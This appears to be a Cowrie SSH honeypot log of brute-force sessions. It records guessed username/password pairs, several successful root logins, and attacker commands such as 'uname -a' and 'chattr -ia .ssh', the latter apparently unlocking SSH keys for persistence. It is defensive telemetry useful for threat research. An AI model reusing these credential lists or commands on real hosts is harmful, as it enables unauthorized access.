{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T02:13:31.891807Z","src_ip":"212.227.235.229","session":"d451df39bceb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:13:32.528379Z","src_ip":"212.227.235.229","session":"d451df39bceb"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:13:32.674412Z","src_ip":"212.227.235.229","session":"88dff4b3f7af"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:13:32.675317Z","src_ip":"212.227.235.229","session":"d451df39bceb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46821,"dst_ip":"1.2.3.4","dst_port":22,"session":"edd2605dbf85","protocol":"ssh","message":"New connection: 212.227.235.229:46821 (1.2.3.4:22) [session: edd2605dbf85]","sensor":"my-vps","timestamp":"2025-08-31T02:13:45.924827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T02:13:45.925792Z","src_ip":"212.227.235.229","session":"edd2605dbf85"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T02:13:46.053670Z","src_ip":"212.227.235.229","session":"edd2605dbf85"}
{"eventid":"cowrie.login.failed","username":"squid","password":"squid","message":"login attempt [squid/squid] failed","sensor":"my-vps","timestamp":"2025-08-31T02:13:46.649606Z","src_ip":"212.227.235.229","session":"edd2605dbf85"}
{"eventid":"cowrie.login.failed","username":"squid","password":"abc123","message":"login attempt [squid/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:13:47.795431Z","src_ip":"212.227.235.229","session":"edd2605dbf85"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":60946,"dst_ip":"1.2.3.4","dst_port":22,"session":"f08647c30979","protocol":"ssh","message":"New connection: 41.226.27.251:60946 (1.2.3.4:22) [session: f08647c30979]","sensor":"my-vps","timestamp":"2025-08-31T02:13:48.726272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:13:48.731918Z","src_ip":"41.226.27.251","session":"f08647c30979"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:13:48.773775Z","src_ip":"41.226.27.251","session":"f08647c30979"}
{"eventid":"cowrie.login.failed","username":"squid","password":"abcd123","message":"login attempt [squid/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:13:48.924340Z","src_ip":"212.227.235.229","session":"edd2605dbf85"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:13:48.962562Z","src_ip":"41.226.27.251","session":"f08647c30979"}
{"eventid":"cowrie.login.failed","username":"squid","password":"abcd1234","message":"login attempt [squid/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T02:13:50.055280Z","src_ip":"212.227.235.229","session":"edd2605dbf85"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:13:50.148787Z","src_ip":"41.226.27.251","session":"f08647c30979"}
{"eventid":"cowrie.login.failed","username":"squid","password":"abc1234","message":"login attempt [squid/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T02:13:51.185718Z","src_ip":"212.227.235.229","session":"edd2605dbf85"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:13:52.323128Z","src_ip":"212.227.235.229","session":"edd2605dbf85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57498,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c4c88aa74a3","protocol":"ssh","message":"New connection: 212.227.235.229:57498 (1.2.3.4:22) [session: 5c4c88aa74a3]","sensor":"my-vps","timestamp":"2025-08-31T02:13:57.725920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:13:58.473319Z","src_ip":"212.227.235.229","session":"5c4c88aa74a3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:13:58.498051Z","src_ip":"212.227.235.229","session":"5c4c88aa74a3"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"letmein","message":"login attempt [elastic/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T02:14:04.430892Z","src_ip":"212.227.235.229","session":"5c4c88aa74a3"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:06.361755Z","src_ip":"212.227.235.229","session":"5c4c88aa74a3"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52998,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d94c28dc013","protocol":"ssh","message":"New connection: 41.226.27.251:52998 (1.2.3.4:22) [session: 3d94c28dc013]","sensor":"my-vps","timestamp":"2025-08-31T02:14:09.314893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:14:09.318243Z","src_ip":"41.226.27.251","session":"3d94c28dc013"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:14:09.358590Z","src_ip":"41.226.27.251","session":"3d94c28dc013"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-31T02:14:09.531402Z","src_ip":"41.226.27.251","session":"3d94c28dc013"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:10.788072Z","src_ip":"41.226.27.251","session":"3d94c28dc013"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47802,"dst_ip":"1.2.3.4","dst_port":22,"session":"55e702c6da61","protocol":"ssh","message":"New connection: 212.227.125.160:47802 (1.2.3.4:22) [session: 55e702c6da61]","sensor":"my-vps","timestamp":"2025-08-31T02:14:19.144510Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:14:19.695413Z","src_ip":"212.227.125.160","session":"55e702c6da61"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:14:19.696365Z","src_ip":"212.227.125.160","session":"55e702c6da61"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"letmein","message":"login attempt [elastic/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T02:14:21.137851Z","src_ip":"212.227.125.160","session":"55e702c6da61"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:22.601017Z","src_ip":"212.227.125.160","session":"55e702c6da61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36440,"dst_ip":"1.2.3.4","dst_port":22,"session":"318135634e19","protocol":"ssh","message":"New connection: 212.227.125.160:36440 (1.2.3.4:22) [session: 318135634e19]","sensor":"my-vps","timestamp":"2025-08-31T02:14:22.688615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:14:23.810193Z","src_ip":"212.227.125.160","session":"318135634e19"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:14:23.811242Z","src_ip":"212.227.125.160","session":"318135634e19"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41254,"dst_ip":"1.2.3.4","dst_port":22,"session":"45b6dc5758a6","protocol":"ssh","message":"New connection: 41.226.27.251:41254 (1.2.3.4:22) [session: 45b6dc5758a6]","sensor":"my-vps","timestamp":"2025-08-31T02:14:29.449915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:14:29.450680Z","src_ip":"41.226.27.251","session":"45b6dc5758a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:14:29.496432Z","src_ip":"41.226.27.251","session":"45b6dc5758a6"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:14:29.633966Z","src_ip":"41.226.27.251","session":"45b6dc5758a6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:30.884583Z","src_ip":"41.226.27.251","session":"45b6dc5758a6"}
{"eventid":"cowrie.login.success","username":"root","password":"tancamara10","message":"login attempt [root/tancamara10] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:14:31.726451Z","src_ip":"212.227.125.160","session":"318135634e19"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":58060,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1274c8306e4","protocol":"ssh","message":"New connection: 201.148.180.50:58060 (1.2.3.4:22) [session: d1274c8306e4]","sensor":"my-vps","timestamp":"2025-08-31T02:14:39.122839Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:14:39.650940Z","src_ip":"212.227.125.160","session":"318135634e19"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T02:14:39.651644Z","src_ip":"212.227.125.160","session":"318135634e19"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:40.958272Z","src_ip":"201.148.180.50","session":"d1274c8306e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:41.213957Z","src_ip":"212.227.125.160","session":"318135634e19"}
{"eventid":"cowrie.session.closed","duration":"18.5","message":"Connection lost after 18.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:41.215210Z","src_ip":"212.227.125.160","session":"318135634e19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31638,"dst_ip":"1.2.3.4","dst_port":22,"session":"6909e115c644","protocol":"ssh","message":"New connection: 212.227.235.229:31638 (1.2.3.4:22) [session: 6909e115c644]","sensor":"my-vps","timestamp":"2025-08-31T02:14:41.364908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T02:14:41.374708Z","src_ip":"212.227.235.229","session":"6909e115c644"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T02:14:41.618606Z","src_ip":"212.227.235.229","session":"6909e115c644"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2q3q4q5q","message":"login attempt [root/1q2q3q4q5q] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:14:42.570128Z","src_ip":"212.227.235.229","session":"6909e115c644"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:14:43.051143Z","src_ip":"212.227.235.229","session":"6909e115c644"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T02:14:43.052000Z","src_ip":"212.227.235.229","session":"6909e115c644"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T02:14:43.053330Z","src_ip":"212.227.235.229","session":"6909e115c644"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:43.289220Z","src_ip":"212.227.235.229","session":"6909e115c644"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:14:43.825794Z","src_ip":"212.227.235.229","session":"6909e115c644"}
